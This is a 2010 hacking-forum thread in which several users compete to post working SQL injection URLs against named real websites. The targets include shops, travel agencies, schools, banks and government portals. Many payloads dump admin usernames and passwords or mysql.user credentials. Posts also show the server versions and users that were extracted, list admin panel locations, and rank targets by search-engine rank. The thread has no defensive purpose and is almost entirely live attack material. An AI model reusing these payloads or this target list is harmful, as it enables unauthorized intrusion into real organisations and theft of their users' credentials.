View full version: SQL Injections
shell_c0de
18.08.2010, 03:40
well ok, let's continue )
http://www.muskelzone.de/article.php?id=163'/*!limit+0+union+select+1,2,concat_ws(0x3a,admin_id ,admin_name,admin_email,admin_pass),4,5,6,7,8+from +shop_admin*/+--+!
%username%, are you just going to stand there and watch? )
http://www.stows.co.uk/index.php?_a=viewProd&productId=342+or+(1,1)=(select+count(0),concat((se lect+password+from+cc3CubeCart_admin_users+limit+0 ,1),floor(rand(0)*2))from(information_schema.table s)+group+by+2)--+
[Feldmarschall]
18.08.2010, 03:46
well, in that case, let's continue =), well, sort of cooler than a shop..
http://www.datenretter.de/aspprog/emamediaselection.asp?SEID=1'+or+1=(select top 1 table_name from information_schema.tables)--
Version:
Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
http://www.bernu-preces.lv/index.php?productID=588+or+(1,1)=(select+count(0), concat((select+version()+from+information_schema.t ables+limit+0,1),floor(rand(0)*2))from(information _schema.tables)+group+by+2)--+
shell_c0de
18.08.2010, 03:55
http://www.pharmasports.de/pharmasports/index.php?cat=16+and+row(1,2)in(seleCt%20Count(*), ConCat((seleCt+Count(*)+from+orders+limit+1),floor (rand(0)*2))as+a+from+orders+x+group+by+a)--&sort=&XTCsid=d5ack1mr1kcibkt7o0h0dun41tmqcebc&filter_id=26
path : /srv/www/htdocs/web2/html/pharmasports/
http://sadovod.net/index.php?productID=4281'+or+(1,1)=(select+count(0 ),concat((select+version()+from+information_schema .tables+limit+0,1),floor(rand(0)*2))from(informati on_schema.tables)+group+by+2)--+
[Feldmarschall]
18.08.2010, 04:11
shop..
http://www.epier.com/l2.asp?catid=8082+or+1=(select top 1 table_name+from+information_schema.tables)
around 600-700 tables..
Version:
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4
http://www.cbperformance.com/catalog.asp?ProductID=1665+and+1=@@version
BrainDeaD
18.08.2010, 04:52
I'll play along with you
no idea if it's a shop or not
Code:
http://www.olionatura.de/_rohstoffe/index.php?id=-62+union+select+1,concat_ws(0x3a,database(),versio n(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18+--
database:d0036ec4
version:5.0.51a-3ubuntu5.7-log
user:d0036ec4@127.0.0.1
[Feldmarschall]
18.08.2010, 04:52
shop..
http://www.onelifeoutfitters.com/detail.cfm?ID=355297&storeid=78 and ascii(substring((database()),17,1))=115
we'll be sitting here like this until morning(
http://550cord.com/products/info.asp?ProductID=7'+or+(1,1)=(select+count(0%20) ,concat((select+version()+from+information_schema. tables+limit+0,1),floor(rand(0)*2))from(informatio n_schema.tables)+group+by+2)--+
[Feldmarschall]
18.08.2010, 05:15
Shop........
http://www.tabak-shop.ru/index.php?mod=showpodcat&podcatid=-14'+union+select+1,2,concat_ws(0x3a,version(),user (),database()),4,5,6,7,8,9,10+and+'1'='1
SWISS WATCH REPLICAS
http://www.clockmarket.ru/catalog/index.php?brand_id=-8+and+1=2+union+select+1,concat_ws(0x3a,@@version, user(),database(),@@version_compile_os),3,4,5,6+--#80101
version : 5.0.51A-24+LENNY4
user : CLOCKMARKET@LOCALHOST
database : CLOCKMARKET
os : DEBIAN-LINUX-GNU
Code:
http://www.nigeriaff.com/Newsdisplay.php?ID=-181+union+select+1,concat_ws(0x3a,Username,Passwor d),3,4,5,6,7,8,9,10,11+from+userlogin+limit+1,1--+
http://vniisubtrop.ru/news.php?id=-14+union+select+1,2,concat_ws(user(),version()%20, database()),4,5,6,7,8+--+
www.luberec.ru/realty_ads.php?aid=-123+inion+select+1+--+
http://www.pushkino-online.ru/realty_ads.php?aid=-123+inion+select+1+--+
http://www.lobnya-online.ru/realty_ads.php?aid=-123+inion+select+1+--+
http://oz-gorod.ru/realty_ads.php?aid=-123+inion+select+1+--+
http://www.nasha-balashiha.ru/realty_ads.php?aid=-123+inion+select+1+--+
http://www.krasnogor.ru/realty_ads.php?aid=-123+inion+select+1+--+
http://www.gorodhimki.ru/realty_ads.php?aid=-123+inion+select+1+--+
http://www.gorodkorolev.ru/realty_ads.php?aid=-123+inion+select+1+--+
-PRIVAT-
18.08.2010, 19:23
http://www.unitedpurpose.org/archive/news.php?page=2&id=-86+union+select+1,2,3,version%28%29,5,6,7,8,9,0,1, 2,3%20+--+
PR 1
http://kpreps.com/Archive/news.php?id=-34+union+select+1,2,3,4,5,6,7,8,9,0--
PR 1
http://www.studiotranfaglia.it/old/news.php?id=-219+union+select+1,2,3,4,5,6,7,8,9,0,1%20--
PR 2 TIC 10
http://www.mhs.ox.ac.uk/sis25/objects.php?id=-4+union+select+1,2,3,4,5,6+--+
PR 7 TIC 50
[Feldmarschall]
18.08.2010, 20:28
https://www.regsoft.net/regsoft/vieworderpage.php3?productid=34083&ordertypeid=-3+union+select+1,2,3,4,5,6,7,8,9,10,11,version(),1 3,14
Classik+
18.08.2010, 20:55
http://metal-dekor.ru/index.php?option=com_simpleshop&task=browse&Itemid=30&catid=-1%20UNION%20SELECT%20user%28%29,concat%28username, 0x3a,password%29,user%28%29,user%28%29,user%28%29, user%28%29,user%28%29,user%28%29%20FROM%20jos_user s--
host6518@localhost
http://boldproxy.com/jump.php?id=-1+union+select+1,group_concat(table_name)+FROM+inf ormation_schema.tables+Where+table_schema=0x626F6C 6470726F787970746E6577--
a foreign social network
[Feldmarschall]
19.08.2010, 06:11
Bank of Bahrain[Bahrain Monetary Agency]
Code:
http://www.bma.gov.bh/page.php?p=-industry_newsletters'+union+select+1,concat_ws(0x3 a,version(),database(),user()),3,4,5,6+order+by+'1 '='1
-----
Ver: 5.1.47-community
db: cbb
usr: cbb@localhost
Since it's come to this, then...
North American Jewish Data Bank
http://www.jewishdatabank.org/study.asp?sid=18092+and+1=(select+top+1+table_name +from+information_schema.tables)
PR-7
[Feldmarschall]
19.08.2010, 07:07
well, in that case, let's continue )
Bank of Belize
Code:
http://www.centralbank.org.bz/dms20uc/dm_browse.asp?pid=convert(int,(select db_name()))
http://www.northcott.com.au/news.php?id=-109;select+cast(username||chr(58)||password%20as%2 0int),null,null,null,null,null,null,null+from+site s+limit+1+offset+1
http://www.railwayminsk.by/news.php?id=-248+union+select+1,2,group_concat(login,char(58),p assw),4+from+admins
http://www.peggyyihmd.com/news.php?id=-7+union+select+1,2,group_concat(user,char(58),pass word),4,5,6+from+mysql.user
http://runoffandrestructuring.com/news.php?id=432+and+1=9+/*!UnIoN+SeLeCt*/+1,group_concat(table_name),3+from+information_sch ema.%60tables%60+where+table_schema=database()
http://www.step-initiative.org/news.php?id=-0000000063+union+select+1,2,3,4,group_concat(usern ame,char(58),password),6,7,8,9,10,11,12,13,14,15,1 6,17,18,19+from+step_users
PR 2
Code:
http://www.egmemory.com/product.php?id=-111+union+select+1,concat_ws(0x2b,version(),user() ,@@version_compile_os)+--+
5.0.90 egmemory@localhost portbld-freebsd8.0
PR 5
Code:
http://www.schlup.net/usb/devices/showdescr.php?id=-4194+UnIon+SeLeCT+concat_ws(0x2b,version(),user(), @@version_compile_os),2,3,4,5+--+
5.1.31+nobody@localhost+pc-linux-gnu
-PRIVAT-
19.08.2010, 11:57
http://www.gs13.ru/modules/teachers/teacher.php?id=-5+union+select+1,2,3,4,5+--+
TIC 20
http://tutioninformation.com/teacher.php?id=-11+union+select+1,2,3,4,5,6,7,8,9%20--
http://viprepetitor.ru/teacher.php?id=-2+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9,0,1,2,3%20--
http://hexin.fudan.edu.cn/hexin/teacher.php?id=-30437+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6 ,7,8,9,0,1,2%20--
http://www.artichokemusic.com/teacher.php?id=-30+union+select+1,version%28%29,3,4,5,6,7,8,9,0,1, 2,3%20--
TIC 10 PR 4
http://www.artifok.com/teacher.php?id=-105+union+select+1,version%28%29,3,4,5,6,7,8,9,0,1 ,2,3%20--
PR 2
http://www.edsa.hk/v2/teacher.php?id=-3+union+select+1,2,3,4,5,6--
PR 3
http://www.smcstn.org/current-students/teacher.php?id=-24+union+select+1,2,3,4,5,6,7--
PR 3
http://forest.ob-i.com/en/teacher.php?id=-21+union+select+1,2,3,4,5,6,7,8,9%20--
PR 6
Code:
http://cloudytags.com/index.php?idlink=-1+UNION+SELECT+1,%20concat_ws(0x3a,version(),datab ase(),user(),@@version_compile_os),3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18&Section=linkdetails
70k users
we keep bombing foreign social networks =)
Code:
http://elanforum.com/search.php?search=advice&tag=true&from=1+or+%28select+count%28*%29+from+%28select+1+ union+select+2+union+select+3+union+select+4+union +select+5%29x+group+by+concat%28user%28%29,floor%2 8rand%280%29*2%29%29%29+--+
another foreign social network
Code:
http://www.thepalladiumdubai.com/events-details.php?id=-48+union+select+1,2,3,4,5,6,concat_ws%280x3a,user_ login,user_pass,user_email%29,8,9,10,11,12,13,14,1 5,16,17,18,19,20+from+pm_users--+
Code:
http://invest-market.kz/deposit/bank.php?id=-null+union+select+concat_ws(0x3a,version(),user(), database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19--
Code:
http://www.apsira.com/loans/bank.php?bankId=-null+union+select+2,3,4,concat_ws(0x3a,version(),u ser(),database()),6,7,8,9,10,11,12--
some banks
Code:
http://www.gabbr.com/treadhottopic.php?id=-13298+union+select+version()&topicTitle=Angelina&topicQuestion=Salt
a social network, with karma whores.
Konki helped =*
website creation and promotion
ARTCREDO
http://www.artcredo.ru/article.php?id=-9+and+1=2+union+select+1,concat_ws(char(58),@@vers ion,user(),database(),@@version_compile_os),3,4+--
version : 4.1.20-log
user : itbrains@localhost
database : itbrains
os : pc-linux-gnu
Code:
http://www.antiddos.biz/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0x3a,username,p assword),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+j os_users--
no idea whether it's allowed to post a fully worked-out SQLi, but I'll risk it
TIC — 50
PR — 2
Code:
http://www.vip-tur.ru/?page=country&id=-49+union+select+1,concat_ws%280x3a,Login,pwd%29,3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,3 9,40,41,42,43+from+linksviptur_admin--+
http://www.ibiblio.org/mpact/mpact.php?op=show_graph&id=7967+union+select+1,2,3,concat_ws(0x3a,user(),v ersion(),database(),username,password),5,6+from+us ers--
http://www.ils.unc.edu/mpact/mpact.php?op=show_graph&id=7967+union+select+1,2,3,user(),5,6--
http://www.ecprov.gov.za PR-7
http://www.ecprov.gov.za/index.php?module=documents&category=-3+union+select+1,concat(user,char(58),password),3+ from+mysql.user--
user() : root
file_priv =Y
http://www.ecprov.gov.za/index.php?module=documents&category=-3+union+select+1,group_concat(username,char(58),pa ssword),3+from+mod_users--
http://www.ecprov.gov.za/tools/
[Feldmarschall]
20.08.2010, 03:20
Code:
http://www.stylussofas.com/stylegallery.php?categoryid=-1'+union+select+1,concat(version(),database(),user ()),3,4,5,6,7,8,9,10,11,12,13,14,15+order+by+'1'=' 1
shop.
Code:
http://www.kimallansilk.com/productdetail.php?proid=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8,9,10,11--
let's continue with travel agencies
TIC — 20
PR — 3
Code:
http://www.ugtour.ru/?query=menu&i=1&s=-274+union+select+1,2,3,user(),5+--+
ugtour@localhost
Yandex TIC 10
Google PageRank 2/10
http://www.n-oil.by/lubrication/newz.php?id=-2+union+select+concat_ws(user(),database()),2,3+--+
--------------------------------------------------------
Google PageRank 1/10
http://www.nutritionalinsider.com/newz.php?id=-17+union+select+1,user(),3,4,5,6,7+--+
admin panel:
http://www.nutritionalinsider.com/admin/
----------------------------------------------------
Some shop, can't work it any further:
http://www.shopert.com/blog.php?id=-43+group+by+2+--+
Lilo said:
I'll pick up the bet, friend
Kusto
Code:
http://www.arctic-adventure.dk/tour.php?id=-38+union+select+1,2,3,version(),5,6,7,8,9,10,11,12
let's continue
TIC — 120
PR — 4
Code:
http://www.vsktour.ru/index.php?pageid=-3+union+select+user()+--+
vsktour@zvm4.host.ru
Kusto said:
let's continue
Code:
http://www.railtrail.co.uk/tour.php?id=-91+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),user(),@@version_compile_os),6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,4 4,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60, 61,62,63,64,65--
got worn out picking them =(
4.1.20:site:siteadmin@localhost:redhat-linux-gnu
PR -3
http://www.dzz.gov.ua
http://www.dzz.gov.ua/CPOSI/style/page_2/templer_page2_ua.php?id=-2+union+select+1,2,version(),4,5,6,7,8+from+inform ation_schema.tables&table=info
and I didn't want to break it any further anyway...
http://www.upperuwchlan-pa.gov/newsfull.php?id=-110+union+select+1,group_concat(0x0b,id,0x3a,usern ame,0x3a,password),3,4,5,6,7,8+from+admin+--
PR 4
panel:
Code:
http://www.upperuwchlan-pa.gov/cpanel/
http://www.sitsantacruz.gov.ar
http://www.sitsantacruz.gov.ar/iniciog.php?opcion=bb01-01&id=-7+union+select+1,2,group_concat(user,char(58),pass 1),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+fr om+subse_seguridad.usuarios
.:[melkiy]:.
20.08.2010, 05:10
PR 5
Code:
http://www.socialistreview.org.uk/article.php?articlenumber=-11176+union+select+1,2,3,4,5,6,7,8,9,10,11,12,conc at_ws(0x3a,name,password),14,15,16,17,18,19,20,22+ from+auth+limit+5,1
http://www.ezhouinvest.gov.cn
http://www.ezhouinvest.gov.cn/webezzs/info.php?rid=-337+union+select+1,2,3,4,5,group_concat(LoginName, char(58),password),7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26+from+ezzs_admin_user
http://www.ezhouinvest.gov.cn/webezzs/admin
http://www.partner.dn.ua/p.php?n=-64+union+select+1,concat_ws(user(),version()%20,da tabase()),3,4+--+
user uh105674_bot@nvh122.mirohost.net
version 5.0.91
database uh105674_bot
TIC 325 Yandex Rank 4/6 Google PageRank 2/10
-PRIVAT-
20.08.2010, 11:59
http://tutioninformation.com/teacher.php?id=-11+union+select+1,2,3,4,5,6,7,8,9%20--
Well, let's keep bombing travel agencies and social networks!
http://www.vostok.cc/tourpage.php?id=-10+union+select+1,2,3%20--
Vostok Travel! PageRank 2
http://www.baseballprospectus.com/article.php?articleid=-878+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,group _concat(table_name),6,7,8,9,0,1,2+from+information _schema.tables+--+
PR 6
http://www.emanuellevy.com/search/details.cfm?id=-5612+union+select+group_concat(table_NaME),2,3,4,5 ,67,8,9,1+from+information_schema.tables --
PR 4
http://www.lifeyoga.com.hk/eng/teacher.php?id=-4+union+select+1,2,3,4,5,67,8,9,0--
PR 3
travel company CITTOURS
http://cittours.ca/tour.php?id=-76+union+select+1,2,3,4,5,concat(host,char(58),use r,char(58),password),7,8+from+mysql.user&info=hotels
Code:
http://www.hotel.is/hotel.php?id=-116+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws (0x3a,version(),database(),user(),@@version_compil e_os),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37,38--
TIC-10
pr-4
not a travel firm, but not bad either, some hotel =)
http://russianagent.com/showTour.php?tour=26+and+1=0+union+select+1,2,3,4, 5,group_concat(table_name),7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+f rom+information_schema.tables+where+table_schema=d atabase()
Code:
http://www.govtube.ps/slider.php?cat=1+and+1=0+Union%20Select+1,2,3,conc at_ws%280x3a,username,email,level%29,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36+from+users--+
gcctube:ijalanbo@gov.ps:Admin
Code:
http://www.govtube.ps/admin_area/login.php
PR:5
moodoone
20.08.2010, 18:01
Code:
http://www.edwar.ru/section.php?id=-35+UnIon+selECt+1,group_concat(table_name),3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17+from+information_sc hema.tables--+
TIC: 30
PR: 4
Code:
http://abrionline.org/player.php?id=-58+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,ver sion(),database(),user(),@@version_compile_os)%20% 20,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 ,26,27,28,29,30,31,32,33,34,35,36,37,38--
PR-5
Code:
http://www.lycheetube.com/videos/player.php?id=-938021+union+select+1,table_name,3,4,5,6+from+info rmation_schema.tables%20--
porn
Code:
http://www.annaghunited.co.uk/player.php?id=-13+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),user(),@@version_compile_os),5,6,7,8,9,10, 11,12--
some football club
PR 2
Code:
http://www.fulltubemovies.com/videos/player.php?id=-52575+union+select+1,2,concat_ws(0x3a,version(),da tabase(),user(),@@version_compile_os),4,5,6--&from=c
porn again
.:[melkiy]:.
20.08.2010, 18:59
shop
Code:
http://www.spoonsports.co.uk/product.php?make=HONDA&model=&type=&level1=EXTERIOR+STYLING&level2=&level3=&id=-2990+union+select+1,2,count(*),4,5,6,7,concat_ws(0 x3a,version(),user(),database()),9,10+from+informa tion_schema.tables
where did we leave off with the travel agencies? OK
TIC — 230
PR — 4
Code:
http://www.amigo-tours.ru/czechia_ru/firms/index.html?id=-56+union+select+1,concat_ws(0x3a,version(),user(), database())+--+
Code:
http://www.flatart.ru/base.php?id=-12+union+select+1,2,3,user()+--+
P.S. I won't be joining your game with domains in the gov zone, sorry
A travel agency and something similar..
Code:
http://www.trevelone.ru/hotel.php?id=367+or+(select+count(*)from(select+1+ union+select+2+union+select+3)x+group+by+concat(mi d((select+concat_ws(0x3a,username,0x3a,password)+f rom+lore_users+limit+0,1),1,64),floor(rand(0)*2)))--
http://www.belarus-tour.com/lib/detail.php?cat=1&rub=2&id=-2847+union+select+1,2,3,4,group_concat(username,ch ar(58),passwd),6,7,8,9,10,11,12,13,14+from+bank_us er
The latest scientific technologies in medicine
Wellness Trading
http://www.wellnesstrading.ru/content.php?id=2&cid=-20+and+1=2+union+select+1,concat_ws(char(58),@@ver sion,user(),database(),@@version_compile_os),3,4,5 +--
version : Debian_7etch12
user : vellness@localhost
database : vls_bs
os : pc-linux-gnu
-PRIVAT-
20.08.2010, 22:51
http://www.gome.com.hk/insidepage.php?act=soa&id=-814+union+select+1,2,3,group_concat%28table_name%2 9,5,6,7,8,9,0,1,2,3,4+from+information_schema.tabl es%20--
PR 4 TIC 10
http://www.arihant.com/insidepage.php?catid=-295+union+select+1,2,3,4%20--
PR 3 TIC 10
http://www.drramanbjp.org/hindi/insidepage.php?catid=-70+union+select+1,2,3,4+--+
PR 1
http://ess.ustc.edu.cn/teacher.php?id=-14+union+select+1,concat,3,4,5,6,7,8,9,0,1,2,3+fro m+--#jump_
PR 8 TIC 50
http://training2.cyol.com/expert/teacher.php?id=302+union+sleect+1,2,3,4,5,6,7,8,9, 0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8%20--
PR 8 TIC 10
http://www.volanbusz.hu/travel.php?id=-30+union+select+1,2,group_concat%28table_name%29,4 ,5,6,7,8,9+from+information_schema.tables%20--
PR 6
http://www.airsouthwest.com/travel.php?id=-35+union+select+1,concat_ws%28password%29,3,4,5,6, 7,8,9,0,1,2+from+user%20+--+
PR 6 TIC 20
the domain is Chinese but there's some Arabic site on it; I think it fits our theme of travel and tours
Code:
http://www.uqur.cn/tur.php?tur=9+and+1=0+union+select+1,concat_ws%280 x3a,ner_name,ner_pass%29+from+ner_admin+--+
http://www.audioport.eu/index.php?productID=1765'or+(1,1)=(select+count(0) ,concat((select+concat_ws(0x3a,U_ID,u_password)+fr om+WBS_USER+limit+1,1),floor(rand(0)*2))from(infor mation_schema.tables)+group+by+2)--+
Let's continue the tourism theme
dumped all the tables but didn't find the users or the admin
Code:
http://www.yeniatilim.com/yurtici-tur.php?git=listele&id=-46+union+select+1,2,3,4,5,6,7,user(),DATABASE(),VE RSION(),11,12,13,14,15,16,17,18,19+--+
atilim_atilim@localhost
atilim_db
5.0.91-community-log
posting one more worked-out SQLi (Konki, don't be mad) Something to do with Africa, a Sudanese site or something,
Code:
http://www.sudanvotes.com/topics/index-ar.php?id=7+and+1=0+union+select+1,2,3,concat_ws%2 80x3a,username,password%29,5+from+admins+--+
http://www.kartalram.gov.tr
http://www.kartalram.gov.tr/?p=galeri&id=-12+union+select+1,2,group_concat(table_name)+from+ information_schema.tables+where+table_schema=datab ase()--
column 3 - image href
http://www.columbuscomets.com/player.php?id=-52+union+select
Code:
+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database (),user(),@@version_compile_os),10,11,12,13--
hockey, something like that.
Code:
http://www.extrapost.com/videos/player.php?id=-35727+union+select+1,COLUMN_NAME,3,4,5,6+from+INFO RMATION_SCHEMA.COLUMNS--&from=c
porn
http://www.hotelvillazurich.com/index.phtml?id=-4000+union+select+1,2,3,4,5,6,7,8,9
http://www.ezosunalcocukatolyesi.com/index.phtml?id=-20000+union+select+1,2,version(),4,5,6,7,8,9
http://www.cografyasaati.com/index.phtml?id=-140000+union+select+1,version(),3,4,5--
http://www.artima.com.tr/index.phtml?dil=1&id=-40+union+select+1,2,version(),4,5,6,7&gid=3&rid=638
http://www.digicag.com.tr/index.phtml?id=-214000+union+select+1,version(),3,4,5
Code:
http://www.saucony.kiev.ua/sport.php?id=-6+union+select+1,2,TABLE_NAME,4,5,6,7,8,9++from+IN FORMATION_SCHEMA.TABLES--
moodoone
21.08.2010, 15:55
Code:
http://results.orienteeringsport.com/participant.php?id=-1559+union+select+1,2,version()--
Code:
http://www.networkandgetwork.com/participant.php?id=-97+UnIon+selECt+1,2,database(),user(),version(),6, 7,8,9,10,11,12,13,14,15--
Code:
http://equal.ccbcnes.org/content/participant.php?id=-2+UnIon+selECt+1,2,3,4,5,6,7,8,9,10,11,12+--+
Code:
http://www.firagirona.com/participant.php?id=118&cl=-100005+UnIon+selECt+1,2,3,4,5,6,7,8,version(),10,1 1,12--
Code:
http://www.elysee.ru/showimg.php?id=-245+UnIon+selECt+1,2,3,4,5,6,7,8,9,group_concat(ta ble_name)+from+information_schema.tables--+
Code:
http://www.8op10.be/showimg.php?id=-68+UnIon+selECt+1,2,3,4,5+--+
Code:
http://www.pikipoika.ru/news.php?action=news&id=-14+union+select+1,2,3,table_name,5,6+from+informat ion_schema.tables+limit+1,1--
Code:
http://avtoram.com/index.php?action=news&id=-1+union+select+1,concat(version(),0x3a,user(),0x3a ,database()),3,4--
Code:
http://www.posttypography.com/site/index.php?action=news&id=-796+union+select+1,2,concat(version(),0x3a,user(), 0x3a,database()),4--
-PRIVAT-
21.08.2010, 16:22
http://www.csie.chu.edu.tw/2003/content.php?nid=-43+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7, 8,9,0--
PR 7 TIC 10
http://eeweb.hit.edu.tw/teacher/teacher.php?id=-27+union+select+1,2,3,4,5,6,7,8,9,0,group_concat%2 8table_name%29,2,3,4,5,6,7,8,9,0,1,2,3,4,5+from+in formation_schmea.tables--
PR 6 TIC 10
http://ess.ustc.edu.cn/teacher.php?id=-14+union+select+1,concat_ws%280x3a,id,username,pas sword,usertype%29,3,4,5,6,7,8,9,0,1,2,3+from+db_us er--#jump_
PR 8 TIC 50
http://www.starswelove.com/scriptsphp/news.php?newsid=-6431+union+select+1,group_concat%28table_name%29,3 ,4,5,6,7,8,9,0,1,2,3,4,5,6,7+from+information_sche ma.tables%20--
PR 4 TIC 20
http://www.russell-watson.com/news.php?newsID=-18+union+select+1,2,3,4,version%28%29,concat%28@i: =0x00,@o:=0x0d0a,benchmark%28141,@o:=CONCAT%28@o,0 x0d0a,%28SELECT+concat%28table_schema,0x2E,@i:=tab le_name%29+from+FROM+information_schema.tables+WHE RE+table_name%3E@i+order+by+table_name+LIMIT%201%2 9%29%29,@o%29%20--
PR 5 TIC 10
http://www.digitalproductionbuzz.com/news.php?newsid=-1668+union+select+1,2,3,4,5,6,7,8,9 --
PR 6
Code:
http://ufa.prepod.org/vote.php?id=-3468+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47, 48,49.50,51,52,53,54,55,56,57,58,59,60,61,62,63,64 ,65,66,67,68,69,70,71,71,72,73,74,75,76,77,78,79,8 0--
TIC-20
a site about teachers =)
winstrool
21.08.2010, 17:09
TIC 10 PR 1
_http://www.domoteka.org/lot_kv.php?vid=kv1&id=111+union+select+1,2,3,4,5,6,7,8,9,0,11,version (),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,concat_ws(0x3a,name,pass)+from+users--
moodoone
21.08.2010, 21:56
Code:
http://www.ultratune.com.au/compview.php?id=-666+union+select+1,version(),3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20--
http://www.ultratune.com.au/admin/admin.php
http://archee.qc.ca/ar.php?page=article&no=-344+union+select+1,2,3,4,5,6,7,8,9,user(),11,12,13 ,14,15,16,version(),database(),19,20,21,22,23,24,2 5,26,27,28,29,30,31,32,33+--+
http://www.quieromiautoya.com.ar/php/subweb/index.php?id=4+and+1=0+union+select+1,2+--+
http://www.burrowsluongo.com/type.php?id=-11+union+select+1,user()+--+
http://www.recipe.ru/docs/nd/type.php?id=-6+union+select+1,user()+--+
now on the topic of tours, posting a worked-out SQLi; here I deliberately pulled the 3rd user so you can appreciate the admin's humor
Code:
http://www.rtk-ust.ru/type.php?id=-6+union+select+concat_ws(0x3a,user,pass),2,3,4+fro m+users+LIMIT+2,1%20+--+
result faster:заебись пароль
switch the encoding to UTF-8 and appreciate all of the admins' humor
and this way you don't even have to switch
http://www.rtk-ust.ru/type.php?id=-6+union+select+concat_ws(0x3a,user,pass),2,3,4+fro m+users+LIMIT+3,2%20+--+
Code:
http://www.saucony.kiev.ua/sport.php?id=-6+union+select+1,2,TABLE_NAME,4,5,6,7,8,9++from+IN FORMATION_SCHEMA.TABLES--
Code:
http://www.starswelove.com/scriptsphp/news.php?newsid=-6431+union+select+1,group_concat%28table_name%29,3 ,4,5,6,7,8,9,0,1,2,3,4,5,6,7+from+information_sche ma.tables%20-
Code:
http://www.combineport.hut2.ru/nasm/mod.php?id=-1+union+select+concat_ws(0x3a,version(),database() ,user(),@@version_compile_os)%20%20,2--
Code:
http://driverb.ru/mod.php?id=-1735+union+select+1,2,3,concat_ws(0x3a,version(),d atabase(),user(),@@version_compile_os)--
Code:
http://www.mksm-kmz.ru/catalog/menu.php?id=-11+union+select+null,null,null,null,null,null,null ,null--
Code:
http://www.biletda.ru/best.php?id=-188+union+select+1,2,3,concat_ws(0x3a,version(),da tabase(),user(),@@version_compile_os),5,6,7,8,9,10 ,11,12,13,14,15-
Code:
http://www.teatrum.ru/best.php?id=-102+union+select+1,2,3,concat_ws(0x3a,version(),da tabase(),user(),@@version_compile_os),5,6,7,8,9,10 ,11,12,13--
Code:
http://www.unlocknews.eu/box.php?id=-78+union+select+1,2,3,4,5,concat_ws(0x3a,version() ,database(),user(),@@version_compile_os)%20%20,7,8--
Code:
http://www.set-radio.ru/radio.php?id=1+union+select+1,concat_ws(0x3a,versi on(),database(),user(),@@version_compile_os),3,4,5 ,6,7--
Code:
http://www.mrcmodelisme.com/fiche_radio.php?id=-23+union+select+1,version(),3--
Code:
http://www.mobile.tomsk.ru/phone.php?id=-37+union+select+1,2,3,%20%20concat_ws(0x3a,version (),database(),user(),@@version_compile_os),5,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 ,26,27,28,29,30--
Code:
http://reales.tonosgratis.com.mx/descarga-tono-real.php?id=-8+union+select+1,2,version()--
Code:
http://www.termoklimat.ru/news.php?id=-377+union+select+1,2,3,version(),5,6+--+
Code:
http://www.artgamma.ru/news.php?id=-45+union+select+1,2,3,4,5,6,7,8,9,10,12,13,14,15,1 6--++
*uNkN0Wn*
22.08.2010, 02:18
PR - 5
http://www.cplmedia.org/story.php?story=-1272+union+select+1,2,group_concat(email,char(58)) ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+tvpol l1--
Code:
http://meteoinfo.by/news/?page=-23618+union+select+1,concat_ws(char(58),version(), user(),database(),@@version_compile_os),3,4,5,6--+
Version: 5.0.27-log
User: guest@localhost
Database: www
Os: redhat-linux-gnu
PR - 4
TIC - 100
Code:
http://www.velotaxi.de/php/main.php?id=\'1&lang=\'en
velotaxidb@web1.dfberlin.de:5.0.32-Debian_7etch12-log:velotaxidb
TIC 10
PR 4
Code:
http://equineexplorer.com/sport.php?id=42+union+select+user()--+
didn't bother outputting the rest
equine_equ1n3u@localhost:4.1.20-standard-log:equine_equ1n3db
PR 3
Code:
http://wch.pasco.k12.fl.us/sport.php?id=-11+UnIon+selECt+1,2,CONCAT_WS(0x3a,USER(),VERSION( ),DATABASE()),4,5,6,7,8,9,10,11,12,13,14+--+
webuser@localhost:5.1.44-community:web
PR 3
shop
